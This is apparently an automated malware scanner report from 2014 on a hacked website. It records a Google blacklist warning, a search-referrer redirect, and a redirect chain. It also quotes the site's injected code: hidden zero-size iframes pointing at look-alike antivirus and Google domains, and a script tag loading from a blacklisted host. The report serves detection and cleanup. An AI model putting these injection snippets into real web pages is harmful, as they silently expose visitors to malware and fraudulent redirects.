New scan:

Malware Scanner report for worldips.info

Malicious/Suspicious/Total urls checked
2/0/9
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "worldips.info" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://medical-brothers.com/
109 websites infected.

The website "worldips.info" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
2/8/10
2 malicious and 8 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=worldips.info

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://worldips.info/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: worldips.info
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 27 Aug 2014 15:31:20 GMT
Location: http://medical-brothers.com/
Server: Jino.ru/mod_pizza
Content-Length: 236
Content-Type: text/html
malicious

Scanned pages/files

RequestServer responseStatus
http://worldips.info/
200 OK
Content-Length: 33950
Content-Type: text/html
malicious
Page code contains blacklisted domain: mobuna.com

...[1695 bytes skipped]...
lt;/head>
<body>
<iframe src="http://wowow.usa.cc/" width="0" height="0" style="visibility: hidden"></iframe>
<iframe src="http://safebrowser.ru/safebrowsing/" width="0" height="0" style="visibility: hidden"></iframe>
<iframe src="http://www.schoolsport.edu.au/safebrowsing/" width="10" height="10" style="visibility: hidden"></iframe><script type="text/javascript" src="http://mobuna.com/js?id=8173"></script>
<iframe src="http://www.schoolsport.edu.au/safebrowsing/" width="cat-item cat-item-2"><a href="http://worldips.info/archives/category/USA" title="Просмотреть все записи в рубрике USA">USA</a> (116)
</li>
<li class="cat-item cat-item-43"><a href="http://worldips.info/archives/category/YUG" title="Просмотреть все записи в рубрике YUG">YUG</a> (9
...[2184 bytes skipped]...

Hidden iFrame found.
size: 0x0     style: hidden
src: http://avp.usa.cc

<iframe src="http://avp.usa.cc" width="0" height="0" style="visibility: hidden">

Hidden iFrame found.
size: 0x0     style: hidden
src: http://kasperksy.usa.cc

<iframe src="http://kasperksy.usa.cc" width="0" height="0" style="visibility: hidden">

Hidden iFrame found.
size: 0x0     style: hidden
src: http://adobs.usa.cc

<iframe src="http://adobs.usa.cc" width="0" height="0" style="visibility: hidden">

Hidden iFrame found.
size: 0x0     style: hidden
src: http://wowow.usa.cc/

<iframe src="http://wowow.usa.cc/" width="0" height="0" style="visibility: hidden">

Hidden iFrame found.
size: 0x0     style: hidden
src: http://kav.usa.cc

<iframe src="http://kav.usa.cc" width="0" height="0" style="visibility: hidden">

Hidden iFrame found.
size: 10x10     style: hidden
src: http://www.schoolsport.edu.au/safebrowsing/

<iframe src="http://www.schoolsport.edu.au/safebrowsing/" width="10" height="10" style="visibility: hidden">

Hidden iFrame found.
size: 0x0     style: hidden
src: http://odobe.usa.cc

<iframe src="http://odobe.usa.cc" width="0" height="0" style="visibility: hidden">

Malicious iFrame found.
size: 0x0     style: hidden
src: http://googie.usa.cc
This URL is marked by Google as suspicious

<iframe src="http://googie.usa.cc" width="0" height="0" style="visibility: hidden">

Malicious iFrame found.
size: 0x0     style: hidden
src: http://nod32.usa.cc
This URL is marked by Google as suspicious

<iframe src="http://nod32.usa.cc" width="0" height="0" style="visibility: hidden">

Hidden iFrame found.
size: 0x0     style: hidden
src: http://safebrowser.ru/safebrowsing/

<iframe src="http://safebrowser.ru/safebrowsing/" width="0" height="0" style="visibility: hidden">

http://mobuna.com/js?id=8173
200 OK
Content-Length: 0
Content-Type: text/javascript
clean
http://mobuna.com/e/8173
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 27 Aug 2014 15:31:22 GMT
Pragma: no-cache
Location: http://retoq.com/l/Qes8rsEkmecDKTu1vvo4KCfnwYi
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: phpsid=1jsisf3epqvhkaraq1jmu77d21; path=/
X-Powered-By: PHP/5.3.10-1ubuntu3.4
malicious
http://retoq.com/l/qes8rsekmecdktu1vvo4kcfnwyi
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 27 Aug 2014 15:31:23 GMT
Pragma: no-cache
Location: /e/2
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: phpsid=abmr402pmm0og0odak60bdmfa4; path=/
X-Powered-By: PHP/5.3.10-1ubuntu3.4
clean
http://retoq.com/e/2
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 27 Aug 2014 15:31:25 GMT
Pragma: no-cache
Location: http://retoq.com/l/EXOuYJmzsZpsw9oJqWRiZvKyY6y
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: phpsid=ksln5cvt039fuvt2lt4118eel1; path=/
X-Powered-By: PHP/5.3.10-1ubuntu3.4
clean
http://retoq.com/l/exouyjmzszpsw9ojqwrizvkyy6y
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 27 Aug 2014 15:31:29 GMT
Pragma: no-cache
Location: /e/2
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: phpsid=6eq4gehttpaqb1s8s0avouaqe5; path=/
X-Powered-By: PHP/5.3.10-1ubuntu3.4
clean
http://retoq.com/test404page.js
404 Not Found
Content-Length: 13
Content-Type: text/html
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21183
Content-Type: text/javascript
clean
http://medicswap.com/js/widget.js
500 Can't connect to medicswap.com:80 (Bad hostname)
Content-Length: 158
Content-Type: text/plain
clean